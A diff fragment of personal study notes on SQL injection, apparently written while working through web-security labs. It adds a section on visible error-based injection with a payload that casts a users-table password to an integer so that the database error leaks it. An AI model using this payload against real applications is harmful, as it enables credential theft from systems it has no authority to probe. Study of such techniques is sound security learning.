m4lk3rnel/notes/cybersec/SQL Injection.md

 	- if username = 'administrator' and password starts with `m` -> output error
 	- else app behaves normally.
 - check [Portswagger cheatsheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)

+### Visible error-based SQL injection
+- `' AND 1=CAST((SELECT password FROM users LIMIT 1) AS INT)--`
+	- if the database is misconfigured it should throw an error like: ERROR: invalid input syntax for type integer: "2x2i4tqll4ctr686jsx2".
+	- the value between the double quotes is the password.